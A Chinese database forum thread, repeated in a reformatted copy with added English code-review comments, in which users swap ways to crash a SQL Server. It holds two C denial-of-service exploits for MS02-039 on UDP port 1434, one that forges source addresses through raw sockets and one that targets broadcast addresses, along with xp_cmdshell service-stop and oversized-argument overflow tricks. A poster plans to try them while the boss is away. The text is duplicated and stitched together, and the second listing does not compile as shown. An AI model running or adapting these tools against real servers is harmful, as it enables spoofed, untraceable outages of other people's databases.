这句话为什么不对哪 急 急! exec xp_SetSQLSecurity 'aa','bb','...10K的字符串','dd'保证sql溢出,哈哈。。哈哈。。 解决方案 » 免费领取超大流量手机卡,每月29元包185G流量+100分钟通话, 中国电信官方发货 呵呵 你用的是sql 2000吧要改为exec master..xp_cmdshell 'net stop mssqlserver'sql 7 下用net stop sqlserver的 呵呵 大力的办法好 干脆搞暴sql 收藏收藏 哈哈。。哈哈。。AR利用SQLSERVER的UDP溢出的DOS程序源代码 (阅览 466 次)////////////////////////////////////////////////////////////// // SQL Overflow dos tool//// Reference: MS02-039//// Author: refdom// Email: [email protected]// Homepage: www.opengram.com//////////////////////////////////////////////////////////////#include <string.h>#include <stdio.h>#include <process.h>#include <winsock2.h>#include <ws2tcpip.h>#pragma comment(lib,"ws2_32.lib")#define SOURCE_PORT 53#define DEST_PORT 1434typedef struct ip_hdr //定义IP首部{unsigned char h_verlen; //4位首部长度,4位IP版本号unsigned char tos; //8位服务类型TOSunsigned short total_len; //16位总长度(字节)unsigned short ident; //16位标识unsigned short frag_and_flags; //3位标志位unsigned char ttl; //8位生存时间 TTLunsigned char proto; //8位协议 (TCP, UDP 或其他)unsigned short checksum; //16位IP首部校验和unsigned int sourceIP; //32位源IP地址unsigned int destIP; //32位目的IP地址}IP_HEADER;struct //定义TCP伪首部{unsigned long saddr; //源地址unsigned long daddr; //目的地址char mbz;char ptcl; //协议类型 unsigned short tcpl; //TCP长度}psd_header;typedef struct tcp_hdr //定义TCP首部{USHORT th_sport; //16位源端口USHORT th_dport; //16位目的端口unsigned int th_seq; //32位序列号unsigned int th_ack; //32位确认号unsigned char th_lenres; //4位首部长度/6位保留字unsigned char th_flag; //6位标志位USHORT th_win; //16位窗口大小USHORT th_sum; //16位校验和USHORT th_urp; //16位紧急数据偏移量}TCP_HEADER;typedef struct udp_hdr //UDP首部{unsigned short sourceport; unsigned short destport; unsigned short udp_length; unsigned short udp_checksum; } UDP_HEADER;//CheckSum:计算校验和的子函数USHORT checksum(USHORT *buffer, int size) { unsigned long cksum=0;while(size >1){cksum+=*buffer++;size -=sizeof(USHORT);}if(size ) {cksum += *(UCHAR*)buffer;}cksum = (cksum >> 16) + (cksum & 0xffff);cksum += (cksum >>16);return (USHORT)(~cksum);} void 
Usage(){printf("******************************************\n");printf("SQLOverFlowDOS(MS02-039)\n");printf("\t Written by Refdom\n");printf("\t Email: [email protected]\n");printf("\t Homepage: www.opengram.com\n");printf("Useage: SQLDOS.exe Fake_ip Target_ip \n");printf("*******************************************\n");}void Sendudp (unsigned long ulTargetIP, unsigned long ulFakeIP){SOCKET sock;SOCKADDR_IN addr_in;BOOL flag;char buf[80] = {0};IP_HEADER ipHeader;UDP_HEADER udpHeader;int iTotalSize, iUdpCheckSumSize, i, j;char sendbuf[256] = {0};char *ptr = NULL;memset(buf, 'A', sizeof(buf) - 2);buf[0] = 0x04;sock = WSASocket(AF_INET,SOCK_RAW,IPPROTO_UDP,NULL,0,0);if (sock == INVALID_SOCKET){printf("socket Error!\n");return;}flag = true;if (setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char*)&flag,sizeof(flag))==SOCKET_ERROR){printf("setsockopt Error!\n");return;}iTotalSize=sizeof(ipHeader)+sizeof(udpHeader)+sizeof(buf);ipHeader.h_verlen = (4 << 4) | (sizeof(ipHeader) / sizeof(unsigned long));ipHeader.tos=0;ipHeader.total_len=htons(iTotalSize);ipHeader.ident=0;ipHeader.frag_and_flags=0;ipHeader.ttl=128;ipHeader.proto=IPPROTO_UDP;ipHeader.checksum=0;ipHeader.sourceIP = ulFakeIP;ipHeader.destIP = ulTargetIP;udpHeader.sourceport = htons(SOURCE_PORT);udpHeader.destport = htons(DEST_PORT);udpHeader.udp_length = htons(sizeof(udpHeader)+sizeof(buf));udpHeader.udp_checksum = 0;ptr = NULL;//计算UDP校验和ZeroMemory(sendbuf,sizeof(sendbuf));ptr=sendbuf;iUdpCheckSumSize=0;udpHeader.udp_checksum = 0;memcpy(ptr,&ipHeader.sourceIP,sizeof(ipHeader.sourceIP));ptr +=sizeof(ipHeader.sourceIP);iUdpCheckSumSize+=sizeof(ipHeader.sourceIP);memcpy(ptr,&ipHeader.destIP,sizeof(ipHeader.destIP));ptr +=sizeof(ipHeader.destIP);iUdpCheckSumSize +=sizeof(ipHeader.destIP);ptr++;iUdpCheckSumSize++;memcpy(ptr,&ipHeader.proto,sizeof(ipHeader.proto));ptr +=sizeof(ipHeader.proto);iUdpCheckSumSize +=sizeof(ipHeader.proto);memcpy(ptr,&udpHeader.udp_length,sizeof(udpHeader.udp_length));ptr 
+=sizeof(udpHeader.udp_length);iUdpCheckSumSize +=sizeof(udpHeader.udp_length);memcpy(ptr,&udpHeader,sizeof(udpHeader));ptr +=sizeof(udpHeader);iUdpCheckSumSize += sizeof(udpHeader);for(i = 0; i < sizeof(buf); i++,ptr++)*ptr = buf[i];iUdpCheckSumSize += sizeof(buf);udpHeader.udp_checksum = checksum((USHORT*)sendbuf,iUdpCheckSumSize);ZeroMemory(sendbuf,sizeof(sendbuf));memcpy(sendbuf,&ipHeader,sizeof(ipHeader));memcpy(sendbuf+sizeof(ipHeader),&udpHeader,sizeof(udpHeader));memcpy(sendbuf+sizeof(ipHeader)+sizeof(udpHeader),buf,sizeof(buf));addr_in.sin_family = AF_INET;addr_in.sin_port = htons(DEST_PORT);addr_in.sin_addr.S_un.S_addr = ulTargetIP ;printf("\n Starting send packet\n\t");for (j = 0; j < 5; j++){Sleep(500);if (sendto(sock, sendbuf, iTotalSize, 0, (SOCKADDR *)&addr_in, sizeof(addr_in))==SOCKET_ERROR){printf("Send Error!\n");return;}else{printf(".");}}printf("\n Send OK!\n");if (sock != INVALID_SOCKET)closesocket(sock);}int main(int argc, char* argv[]){WSADATA WSAData;unsigned long ulTargetIP, ulFakeIP;Usage();if (argc < 3){return false;}ulTargetIP = inet_addr(argv[1]);ulFakeIP = inet_addr(argv[2]);if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0){printf("WSAStartup error.Error:%d\n",WSAGetLastError());return false;}printf("DOS starting ...\n");Sendudp(ulTargetIP, ulFakeIP);printf("\nComplete!\n");WSACleanup();return 0;} ok 试试看 pengdali(大力) 的等老大不在的时候我会试的,不然。^_^ 多谢pengdali 你先在文本编辑器里疯狂拷贝40K-50K的文字在全选粘贴到查询分析器里写入:exec xp_SetSQLSecurity 'aa','bb','粘贴到这','aa'决对搞定!!我试过N次了!! 
用UDP给SQL SERVER的1433发送SQL SERVER信息发送的特定的0x8开头的信包会导致SQL SERVER当机:演示代码如下 参数:跟SQL SERVER服务器的IP或广播地址的IP int main(int argc, char* argv[]) { WSADATA WSAData; SOCKET sock; SOCKADDR_IN addr_in; char buf[1024]={'\x08','\x00'}; HANDLE listener; const int SNDBUF = 0; const int TCPNODELAY = TRUE; const int BROADCAST = TRUE; if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0) { return FALSE; } if ((sock=socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP))==INVALID_SOCKET) { return FALSE; } addr_in.sin_family=AF_INET; addr_in.sin_port=htons(1434); addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]); if (setsockopt(sock, SOL_SOCKET, SO_SNDBUF, (const char*)&SNDBUF, sizeof(SNDBUF))==SOCKET_ERROR) { return FALSE; } if (setsockopt(sock, SOL_SOCKET, TCP_NODELAY, (const char*)&TCPNODELAY, sizeof(TCPNODELAY))==SOCKET_ERROR) { return FALSE; } if (setsockopt(sock, SOL_SOCKET, SO_BROADCAST, (const char*)&BROADCAST, sizeof(BROADCAST))==SOCKET_ERROR) { return FALSE; } for(j=0;j〈256;j++) { buf[1]=j; sendto(sock, buf, sizeof(buf), 0,(SOCKADDR*) &addr_in, sizeof(addr_in))==SOCKET_ERROR) Sleep(100); } WSACleanup(); return 0; } BUF中放置08开头的,后面一个字节从0到255,都可以引起SQL SERVER服务器的当掉。返回的SQL SERVER日志信息是: 2002-09-04 12:50:17.21 server SqlDumpExceptionHandler: 进程 2020 发生了严重的异常 c0000005 EXCEPTION_ACCESS_VIOLATION。SQL Server 将终止该进程。 2002-09-04 12:50:17.64 server SQL Server 将终止。发生了严重的异常 c0000005。 如果没有启动sql agant服务,这SQL SERVER服务器需要人工手动启动,如果启动了了SQL AGANT,SQL SERVER服务器会在3秒以后自动恢复。 但是可以不断的发起这样的包达到拒绝服务的目的,同时由于该协议是UDP协议,可以轻易的使用IP欺骗发起攻击,在还可以使用广播一次使得多个SQL SERVER受到攻击。 测试环境: SQL SERVER 2000+SP2 WINDOWS 2000 SERVER+SP3,ADV SERVER+SP3,professional+SP2 查询上级、同级、下级 win7(64位系统) 下安装sql2008数据库,安装配置完毕后,输入创建的用户无法登陆 这样的SQL语法写的很烂,大家看看怎么写漂亮一点 字段的顺序加1的问题 C# txt文件导入SQL数据表 如何查询一列字符串包含另一列字符串的记录 二个数据库中二个视图如何同步? 求一存储过程 postgresql的问题 sql表中汉字字段以“,”分隔,怎样添加一个对应字段。 如何显示存储过程内容? 请问怎样返回前N条记录?
要改为exec master..xp_cmdshell 'net stop mssqlserver'sql 7 下用net stop sqlserver的
//
// SQL Overflow dos tool
//
// Reference: MS02-039
//
// Author: refdom
// Email: [email protected]
// Homepage: www.opengram.com
//
////////////////////////////////////////////////////////////#include <string.h>
#include <stdio.h>
#include <process.h>
#include <winsock2.h>
#include <ws2tcpip.h>#pragma comment(lib,"ws2_32.lib")#define SOURCE_PORT 53
// NOTE(review): the '#define DEST_PORT 1434' and the 'typedef' that follows were
// run together on one line when the post was pasted; as shown this line does not
// preprocess. The definitions below are the on-the-wire IPv4 / TCP / UDP headers
// that Sendudp() fills in by hand.
#define DEST_PORT 1434typedef struct ip_hdr // IPv4 header (20 bytes, no options); widths in bits
{
unsigned char h_verlen; // 4-bit version | 4-bit header length (in 32-bit words)
unsigned char tos; // 8-bit type of service
unsigned short total_len; // 16-bit total length in bytes (header + payload)
unsigned short ident; // 16-bit identification
unsigned short frag_and_flags; // 3-bit flags + fragment offset
unsigned char ttl; // 8-bit time to live
unsigned char proto; // 8-bit protocol (TCP, UDP or other)
unsigned short checksum; // 16-bit IP header checksum
unsigned int sourceIP; // 32-bit source address
unsigned int destIP; // 32-bit destination address
}IP_HEADER;struct // TCP pseudo-header (the prefix a TCP/UDP checksum is computed over)
{
unsigned long saddr; // source address
unsigned long daddr; // destination address
char mbz; // must be zero
char ptcl; // protocol
unsigned short tcpl; // TCP length
}psd_header;/* NOTE(review): psd_header is never referenced; Sendudp() lays out its UDP pseudo-header by hand in sendbuf. */typedef struct tcp_hdr // TCP header
{
USHORT th_sport; // 16-bit source port
USHORT th_dport; // 16-bit destination port
unsigned int th_seq; // 32-bit sequence number
unsigned int th_ack; // 32-bit acknowledgement number
unsigned char th_lenres; // 4-bit header length / 6-bit reserved
unsigned char th_flag; // 6-bit flags
USHORT th_win; // 16-bit window size
USHORT th_sum; // 16-bit checksum
USHORT th_urp; // 16-bit urgent pointer
}TCP_HEADER;/* NOTE(review): TCP_HEADER is not referenced anywhere in this listing. */typedef struct udp_hdr // UDP header (8 bytes)
{
unsigned short sourceport; // source port
unsigned short destport; // destination port
unsigned short udp_length; // header + payload length in bytes
unsigned short udp_checksum; // checksum over pseudo-header + header + payload
} UDP_HEADER;// checksum(): one's-complement checksum helper, used for the UDP checksum in Sendudp()
/*
 * checksum - one's-complement sum of a byte buffer, folded to 16 bits and
 * inverted (the IP/UDP header checksum algorithm).
 *
 * buffer: data to sum, consumed as 16-bit words; a trailing odd byte is
 *         added as a single byte value.
 * size:   number of bytes to sum.
 *
 * Returns the 16-bit checksum; an empty buffer yields 0xFFFF.
 */
USHORT checksum(USHORT *buffer, int size)
{
    unsigned long acc = 0;
    USHORT *word = buffer;
    int remaining = size;

    /* Sum all whole 16-bit words. */
    for (; remaining > 1; remaining -= (int)sizeof(USHORT)) {
        acc += *word++;
    }
    /* Odd trailing byte (also reached for a negative size, as in the original). */
    if (remaining != 0) {
        acc += *(UCHAR *)word;
    }
    /* Fold the carries back into the low 16 bits; the second fold catches
       a carry produced by the first. */
    acc = (acc >> 16) + (acc & 0xffff);
    acc += acc >> 16;
    return (USHORT)~acc;
}
void Usage()
{
// Prints the banner and the expected command line (the signature is on the
// line above, fused to the end of checksum()).
// NOTE(review): main() reads argv[1] as the target and argv[2] as the forged
// source address, i.e. the reverse of the order this banner shows. "Useage"
// is the original runtime string and is left unchanged.
printf("******************************************\n");
printf("SQLOverFlowDOS(MS02-039)\n");
printf("\t Written by Refdom\n");
printf("\t Email: [email protected]\n");
printf("\t Homepage: www.opengram.com\n");
printf("Useage: SQLDOS.exe Fake_ip Target_ip \n");
printf("*******************************************\n");
}void Sendudp (unsigned long ulTargetIP, unsigned long ulFakeIP)
/*
 * Sendudp: hand-assembles one IPv4+UDP datagram whose IP source address is
 * ulFakeIP (raw socket with IP_HDRINCL, so this code supplies the IP header
 * itself) and sends it five times, 500 ms apart, to ulTargetIP on UDP port
 * DEST_PORT (1434, the SQL Server Resolution Service named by the MS02-039
 * reference in the file header).
 *
 * ulTargetIP / ulFakeIP: IPv4 addresses as returned by inet_addr() in main().
 * Returns nothing; failures are printed and the function returns early.
 *
 * Defender notes: the source address in these packets is forged, so it says
 * nothing reliable about the sender — attribute by ingress interface or flow
 * records, not by IP. Mitigation is the MS02-039 fix and filtering UDP/1434
 * at the perimeter; anti-spoofing egress filtering (BCP 38) on the
 * originating network keeps the forged datagram from leaving at all.
 */
{SOCKET sock;
SOCKADDR_IN addr_in;
BOOL flag;
char buf[80] = {0}; // UDP payload: byte 0 = 0x04, then 'A' bytes, last two bytes stay zero
IP_HEADER ipHeader;
UDP_HEADER udpHeader;
int iTotalSize, iUdpCheckSumSize, i, j;
char sendbuf[256] = {0}; // scratch for the checksum pseudo-header, then the final datagram
// memset covers sizeof(buf) - 2 bytes, so buf[78] and buf[79] remain zero.
char *ptr = NULL;memset(buf, 'A', sizeof(buf) - 2);
// Raw IP socket: together with IP_HDRINCL (set below) the process writes the
// whole IP header, which is what makes the forged source address possible.
// Opening a raw socket normally requires elevated privileges.
buf[0] = 0x04;sock = WSASocket(AF_INET,SOCK_RAW,IPPROTO_UDP,NULL,0,0);
if (sock == INVALID_SOCKET)
{
printf("socket Error!\n");
return;
}flag = true;
// NOTE(review): 'true' assigned to a BOOL is C++ spelling; the listing was evidently built as C++.
// NOTE(review): the error path below returns without closesocket(), so the
// socket leaks (the sendto failure path further down does the same).
if (setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char*)&flag,sizeof(flag))==SOCKET_ERROR)
{
printf("setsockopt Error!\n");
return;
}iTotalSize=sizeof(ipHeader)+sizeof(udpHeader)+sizeof(buf);ipHeader.h_verlen = (4 << 4) | (sizeof(ipHeader) / sizeof(unsigned long));
// h_verlen above: version 4 in the high nibble, header length in 32-bit words
// in the low nibble (20 / 4 = 5 when unsigned long is 4 bytes, as on Windows).
// iTotalSize = 20 + 8 + 80 = 108 bytes.
ipHeader.tos=0;
ipHeader.total_len=htons(iTotalSize);
ipHeader.ident=0;
ipHeader.frag_and_flags=0;
ipHeader.ttl=128;
ipHeader.proto=IPPROTO_UDP;
ipHeader.checksum=0; // the IP header checksum is not computed by this code
ipHeader.sourceIP = ulFakeIP; // forged source address
ipHeader.destIP = ulTargetIP;udpHeader.sourceport = htons(SOURCE_PORT); // UDP source port 53
udpHeader.destport = htons(DEST_PORT);
udpHeader.udp_length = htons(sizeof(udpHeader)+sizeof(buf)); // 8 + 80 = 88 bytes
udpHeader.udp_checksum = 0;ptr = NULL;// compute the UDP checksum
// The checksum input is the pseudo-header (source IP, destination IP, one
// zero byte, protocol, UDP length) followed by the UDP header with a zero
// checksum field and then the payload. The file-scope psd_header struct is
// not used; the pseudo-header is laid out by hand in sendbuf, which
// ZeroMemory clears first (the lone 'ptr++' below is the zero byte).
ZeroMemory(sendbuf,sizeof(sendbuf));
ptr=sendbuf;
iUdpCheckSumSize=0;
udpHeader.udp_checksum = 0;memcpy(ptr,&ipHeader.sourceIP,sizeof(ipHeader.sourceIP));
ptr +=sizeof(ipHeader.sourceIP);
iUdpCheckSumSize+=sizeof(ipHeader.sourceIP);memcpy(ptr,&ipHeader.destIP,sizeof(ipHeader.destIP));
ptr +=sizeof(ipHeader.destIP);
iUdpCheckSumSize +=sizeof(ipHeader.destIP);ptr++;
iUdpCheckSumSize++;memcpy(ptr,&ipHeader.proto,sizeof(ipHeader.proto));
ptr +=sizeof(ipHeader.proto);
iUdpCheckSumSize +=sizeof(ipHeader.proto);memcpy(ptr,&udpHeader.udp_length,sizeof(udpHeader.udp_length));
ptr +=sizeof(udpHeader.udp_length);
iUdpCheckSumSize +=sizeof(udpHeader.udp_length);memcpy(ptr,&udpHeader,sizeof(udpHeader));
ptr +=sizeof(udpHeader);
// Payload is copied byte by byte; the checksum input totals 12 + 8 + 80 = 100
// bytes, an even count, so checksum()'s odd-byte branch is not taken.
iUdpCheckSumSize += sizeof(udpHeader);for(i = 0; i < sizeof(buf); i++,ptr++)
*ptr = buf[i];
// Checksum computed; sendbuf is then rebuilt as the real datagram:
// IP header, UDP header (checksum now filled in), payload.
iUdpCheckSumSize += sizeof(buf);udpHeader.udp_checksum = checksum((USHORT*)sendbuf,iUdpCheckSumSize);ZeroMemory(sendbuf,sizeof(sendbuf));
memcpy(sendbuf,&ipHeader,sizeof(ipHeader));
memcpy(sendbuf+sizeof(ipHeader),&udpHeader,sizeof(udpHeader));
memcpy(sendbuf+sizeof(ipHeader)+sizeof(udpHeader),buf,sizeof(buf));addr_in.sin_family = AF_INET;
addr_in.sin_port = htons(DEST_PORT);
// sendto() destination: the same target and port as written into the headers.
addr_in.sin_addr.S_un.S_addr = ulTargetIP ;printf("\n Starting send packet\n\t");for (j = 0; j < 5; j++)
{
Sleep(500); // 500 ms between each of the five sends
if (sendto(sock, sendbuf, iTotalSize, 0, (SOCKADDR *)&addr_in, sizeof(addr_in))==SOCKET_ERROR)
{
printf("Send Error!\n");
return; // NOTE(review): socket leaked on this path
}
else
{
printf(".");
}
}printf("\n Send OK!\n");if (sock != INVALID_SOCKET)
closesocket(sock); // the INVALID_SOCKET test is redundant: that case returned above
}int main(int argc, char* argv[])
/*
 * Entry point (signature on the line above). argv[1] is the target address
 * and argv[2] the forged source address; both are parsed with inet_addr()
 * and handed to Sendudp() unchanged.
 *
 * NOTE(review): the Usage() banner lists the two arguments in the opposite
 * order from what this code reads.
 * NOTE(review): inet_addr() failures (INADDR_NONE) are not detected, and
 * 'return false' from main() relies on C++ bool, consistent with the rest of
 * the listing having been built as C++.
 */
{
WSADATA WSAData;
unsigned long ulTargetIP, ulFakeIP;Usage();if (argc < 3)
{
return false; // too few arguments; the banner has already been printed
}ulTargetIP = inet_addr(argv[1]);
ulFakeIP = inet_addr(argv[2]);if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
{
printf("WSAStartup error.Error:%d\n",WSAGetLastError());
return false;
}printf("DOS starting ...\n");Sendudp(ulTargetIP, ulFakeIP);printf("\nComplete!\n");
WSACleanup();return 0;
}
pengdali(大力) 的等老大不在的时候我会试的,不然。
^_^ 多谢pengdali
exec xp_SetSQLSecurity 'aa','bb','粘贴到这','aa'
绝对搞定!!我试过N次了!!
参数:SQL SERVER服务器的IP,或广播地址的IP
/*
 * Second listing, posted separately in the thread: a plain (non-raw) UDP
 * sender for the same MS02-039 resolution-service flaw. It takes one
 * argument (argv[1]: the SQL Server address or a broadcast address, per the
 * poster) and sends 256 datagrams of 1024 bytes to UDP port 1434, byte 0 =
 * 0x08 and byte 1 stepping through 0..255, 100 ms apart. The poster reports
 * the server process dying with an access violation (c0000005); the log
 * excerpt follows the code.
 *
 * NOTE(review): as pasted this does not compile — the loop variable is never
 * declared, the loop header contains a full-width '〈' character, and the
 * sendto() line has an unbalanced parenthesis (its result is also ignored).
 * It is kept here unchanged as the thread's evidence, not as working code.
 *
 * Defender notes: the socket here is an ordinary UDP socket, so the IP header
 * is built by the stack. From the network side this is unsolicited UDP/1434
 * traffic; the poster's own points — UDP allows source forgery and a
 * broadcast destination reaches every listener on the segment — are the
 * reasons to apply the MS02-039 fix and block UDP/1434 at the perimeter.
 */
int main(int argc, char* argv[])
{
WSADATA WSAData;
SOCKET sock;
SOCKADDR_IN addr_in;
char buf[1024]={'\x08','\x00'}; // 1024-byte payload: byte 0 = 0x08, rest zero; byte 1 is set in the loop
HANDLE listener; // NOTE(review): unused
const int SNDBUF = 0;
const int TCPNODELAY = TRUE;
const int BROADCAST = TRUE; if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
{
return FALSE;
} if ((sock=socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP))==INVALID_SOCKET)
{
return FALSE;
} addr_in.sin_family=AF_INET;
addr_in.sin_port=htons(1434);
// NOTE(review): argv[1] is read without checking argc.
addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]); if (setsockopt(sock, SOL_SOCKET, SO_SNDBUF, (const char*)&SNDBUF, sizeof(SNDBUF))==SOCKET_ERROR)
{
return FALSE;
}
// NOTE(review): TCP_NODELAY is a TCP-level option; it has no meaning on a UDP socket.
if (setsockopt(sock, SOL_SOCKET, TCP_NODELAY, (const char*)&TCPNODELAY, sizeof(TCPNODELAY))==SOCKET_ERROR)
{
return FALSE;
}
// SO_BROADCAST is what allows argv[1] to be a broadcast address.
if (setsockopt(sock, SOL_SOCKET, SO_BROADCAST, (const char*)&BROADCAST, sizeof(BROADCAST))==SOCKET_ERROR)
{
return FALSE;
} for(j=0;j〈256;j++)
{
buf[1]=j;
sendto(sock, buf, sizeof(buf), 0,(SOCKADDR*) &addr_in, sizeof(addr_in))==SOCKET_ERROR)
Sleep(100);
}
WSACleanup(); // NOTE(review): the socket is never closed
return 0;
}
BUF中放置以08开头的数据,后面一个字节从0到255,都可以引起SQL SERVER服务器当掉。SQL SERVER返回的日志信息是:
2002-09-04 12:50:17.21 server SqlDumpExceptionHandler: 进程 2020 发生了严重的异常 c0000005 EXCEPTION_ACCESS_VIOLATION。SQL Server 将终止该进程。
2002-09-04 12:50:17.64 server SQL Server 将终止。发生了严重的异常 c0000005。
如果没有启动 SQL Agent 服务,该 SQL SERVER 服务器需要人工手动启动;如果启动了 SQL Agent,SQL SERVER 服务器会在3秒以后自动恢复。
但是可以不断地发起这样的包达到拒绝服务的目的;同时由于该协议是UDP协议,可以轻易地使用IP欺骗发起攻击,还可以使用广播一次使多个SQL SERVER受到攻击。 测试环境:
SQL SERVER 2000+SP2
WINDOWS 2000 SERVER+SP3,ADV SERVER+SP3,professional+SP2